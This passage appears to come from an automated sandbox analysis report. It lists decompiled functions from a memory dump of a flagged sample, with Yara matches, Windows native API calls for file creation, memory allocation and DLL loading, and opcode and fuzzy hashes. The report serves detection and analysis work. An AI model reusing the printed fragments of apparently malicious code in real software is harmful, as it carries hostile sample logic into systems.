						E0041CCF0(__eflags,  &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x0040acec
                                                0x0040acef
                                                0x0040acf4
                                                0x0040acf9
                                                0x0040ad03
                                                0x0040ad08
                                                0x0040ad0b
                                                0x0040ad0d
                                                0x0040ad15
                                                0x0040ad1a
                                                0x0040ad1a
                                                0x0040ad21
                                                0x0040ad29
                                                0x0040ad2c
                                                0x0040ad2e
                                                0x0040ad42
                                                0x00000000
                                                0x0040ad44
                                                0x0040ad4a
                                                0x0040acfe
                                                0x0040acfe
                                                0x0040acfe

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419D5A, Relevance: 1.5, APIs: 1, Instructions: 48filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E00419D5A(void* __ebx, void* __ecx, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48) {
				char _v1;
				char* _t79;

				gs =  *((intOrPtr*)(__ecx + 0x54));
				_t79 =  &_v1;
				asm("cmpsb");
				if (_t79 != 0) goto L3;
				_push(_t79);
			}





                                                0x00419d5a
                                                0x00419d5d
                                                0x00419d5e
                                                0x00419d5f
                                                0x00419d60

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
                                                • Instruction ID: f9381d7134a1cfda0c2c6443e205c53c510c5da5d86aabae719b77e45fbee567
                                                • Opcode Fuzzy Hash: feaa8398807b6fb96e7716276cc66b0b518c7afcbcbd638751429a959111c507
                                                • Instruction Fuzzy Hash: 1601ECB2205108BBDB08CF88DC95EDB77ADEF8D714F158688FA4D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x00419f4f
                                                0x00419f57
                                                0x00419f79
                                                0x00419f7d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E00419F3A(void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;
				intOrPtr _t29;

				asm("pushfd");
				asm("sbb esp, [edi+0x55]");
				 *((intOrPtr*)(__esi - 0x741374ab)) = _t29;
				_t11 = _a4;
				_push(__esi);
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                                0x00419f3a
                                                0x00419f3b
                                                0x00419f3e
                                                0x00419f43
                                                0x00419f49
                                                0x00419f4f
                                                0x00419f57
                                                0x00419f79
                                                0x00419f7d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
                                                • Instruction ID: 3801971514b8a8089897fd999247aec2ae4abfdd80a9c7b57ec9780c92e2fe1b
                                                • Opcode Fuzzy Hash: 61b04c525a77874d67790ec602b4d2c75a8c0533b9dd944b7610317aac1f782d
                                                • Instruction Fuzzy Hash: 8FF082B1110149ABCB14EF58DC81CA7BBA8FF48214B05864DFD5897202C234E465CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00419E8A(signed int __eax, void* _a1, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t12;
				signed int _t17;

				_t17 = __eax * 0x558427da;
				_push(_t17);
				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x40a923
				E0041A960(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                                0x00419e8b
                                                0x00419e90
                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
                                                • Instruction ID: 51a1225ca4a49fe52bd5489eb7f031ca537e9b0c3824b2144be3092b8b180da6
                                                • Opcode Fuzzy Hash: 7f824ee33eaed075c4ceca4afb4a4bdb26db5310f2e6f58857ff35fe34f7727d
                                                • Instruction Fuzzy Hash: 29E0C275200208ABD710EFE4CC86FD77B68EF44B20F058559BA5C9B242D530FA5087D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A998F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                • Instruction ID: a15b8af47e4efb8ea668a3f14418aa5d9a1d2b6886b025e5208f5892d88a5080
                                                • Opcode Fuzzy Hash: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                • Instruction Fuzzy Hash: F890026160100512D20175694404616000A97D1391FD1C032A1424699ECF658992F171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                • Instruction ID: f4bd54b5bf831bbc9e69f1551ac1406b83f441b015e97b511b1de3e2849c4bf0
                                                • Opcode Fuzzy Hash: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                • Instruction Fuzzy Hash: 0D90027120100423D21165694504707000997D1391FD1C422A082469CD9B968952F161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                • Instruction ID: 1e479c74a930dbb7ea33a03ed207d21741d401c53c4c0977dc14dbd2bbe76a09
                                                • Opcode Fuzzy Hash: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                • Instruction Fuzzy Hash: 72900261242041625645B56944045074006A7E13917D1C022A1814A94C8B669856E661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                • Instruction ID: a7e5dc4759d1625ba41805ec83abb50d7edd9eb1735cf4a6fa62cbbdafbff437
                                                • Opcode Fuzzy Hash: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                • Instruction Fuzzy Hash: F89002A134100452D20065694414B060005D7E2351F91C025E1464698D8B59CC52B166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                • Instruction ID: 1ee415f62fcc7bc23197f2fae678f616f8e7c0287027dad8e4c0b17d9296dc0e
                                                • Opcode Fuzzy Hash: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                • Instruction Fuzzy Hash: 0D9002A120200013420575694414616400A97E1351B91C031E14146D4DCB658891B165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                • Instruction ID: 0c98212f9dd497fe65c9511947fc41b20cfd05617b1c987f29f40259d2469902
                                                • Opcode Fuzzy Hash: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                • Instruction Fuzzy Hash: 2D9002B120100412D24075694404746000597D1351F91C021A5464698E8B998DD5B6A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                • Instruction ID: 9d1491ed33fba1bba2825f2959545c9a1a3756fe485ba4a5fbc62be0d6ef70ed
                                                • Opcode Fuzzy Hash: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                • Instruction Fuzzy Hash: 2C900265211000130205A9690704507004697D63A1391C031F1415694CDB618861A161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                • Instruction ID: 68577cacf03e93670ad29c050c5fdd55d226c7789325752fb55606666364c01f
                                                • Opcode Fuzzy Hash: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                • Instruction Fuzzy Hash: 1190027120108812D2106569840474A000597D1351F95C421A482479CD8BD58891B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                • Instruction ID: 7c054a974e3105e83e9f5644a268685edbb76e4286ea4597864701f4beaa2fd0
                                                • Opcode Fuzzy Hash: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                • Instruction Fuzzy Hash: E0900261601000524240757988449064005BBE2361791C131A0D98694D8B998865A6A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                • Instruction ID: 0235c36ea7bdcdbc24841a5a9b88e092e6e731b5e84bb4efd8ed8fed32cf97c0
                                                • Opcode Fuzzy Hash: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                • Instruction Fuzzy Hash: D690027120140412D2006569481470B000597D1352F91C021A1564699D8B658851B5B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                • Instruction ID: f4b46b39021c9b4c7c1a5a49f2c3a136c92a869598acb371458f492dbf23ec86
                                                • Opcode Fuzzy Hash: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                • Instruction Fuzzy Hash: CA90027120100812D2807569440464A000597D2351FD1C025A0425798DCF558A59B7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                • Instruction ID: cb008b70dde0232e8d6226cbbb86638acafec2c16bb9ff353fbac24b37e8939e
                                                • Opcode Fuzzy Hash: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                • Instruction Fuzzy Hash: 3A90026121180052D30069794C14B07000597D1353F91C125A0554698CCF558861A561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A997A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                • Instruction ID: d832ba77576803b6286238bc09bbe404ad308535eb4c9bb62c3b66c6f020faa0
                                                • Opcode Fuzzy Hash: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                • Instruction Fuzzy Hash: D390026130100013D240756954186064005E7E2351F91D021E0814698CDF558856A262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
                                                • Instruction ID: 36d071a959a6f0a111c576ec08f9d029a47a7c11d6cb807275366bd40099b6e0
                                                • Opcode Fuzzy Hash: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
                                                • Instruction Fuzzy Hash: 9190026921300012D2807569540860A000597D2352FD1D425A041569CCCF558869A361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                • Instruction ID: a99082bcae208ede5e477a693b704ce9cc5fb811fedd37e9e08f5394a0744ee1
                                                • Opcode Fuzzy Hash: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                • Instruction Fuzzy Hash: 3B90027120100412D20069A95408646000597E1351F91D021A5424699ECBA58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 42%
                                                			E004082EA(void* __eax, void* __edi, signed int __esi, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				signed int _v326413041;
				void* _t16;
				int _t17;
				void* _t24;
				long _t25;
				signed int _t28;
				intOrPtr _t29;
				int _t30;
				void* _t33;
				void* _t35;
				signed int _t40;

				_t24 = __eax;
				asm("out dx, eax");
				_t28 = __esi & _v326413041;
				_t40 = _t28;
				_t33 = _t35;
				_push(_t28);
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t29 = _a4;
				if(_t40 == 0) {
					_push( &_v68);
					_push(_t29); // executed
				}
				_t16 = E0040ACD0(); // executed
				_t17 = L00414E20(_t29, _t16, 0, 0, 0xc4e7b6d6);
				_t30 = _t17;
				if(_t30 != 0) {
					_push(_t24);
					_t25 = _a8;
					_t17 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t43 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t30(_t25, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}
















                                                0x004082ea
                                                0x004082eb
                                                0x004082ed
                                                0x004082ed
                                                0x004082f1
                                                0x004082f6
                                                0x004082ff
                                                0x00408303
                                                0x0040830e
                                                0x00408313
                                                0x00408314
                                                0x00408319
                                                0x0040831d
                                                0x0040831d
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833c
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
                                                • Instruction ID: 2a5eef8f901314b0843d7a4e3f3ed9fc11bc8c2e66449285936594633f3e174b
                                                • Opcode Fuzzy Hash: d5b26fb49fd02839353d2910a504c6bd434ae9aef0d50c2729b65f95eb303eb8
                                                • Instruction Fuzzy Hash: 6901DD31A802297AE710A6559C42FFF772CAB40F54F054019FF04BA1C1D6A9691647E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 55%
                                                			E004082F0(void* __ecx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr _t24;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t24 = _a4;
				if(_t30 == 0) {
					_push( &_v68);
					_push(_t24); // executed
				}
				_t12 = E0040ACD0(); // executed
				_t13 = L00414E20(_t24, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t22, 0x8003, _t26 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                0x004082f0
                                                0x004082ff
                                                0x00408303
                                                0x0040830e
                                                0x00408313
                                                0x00408314
                                                0x00408319
                                                0x0040831d
                                                0x0040831d
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x00000000
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
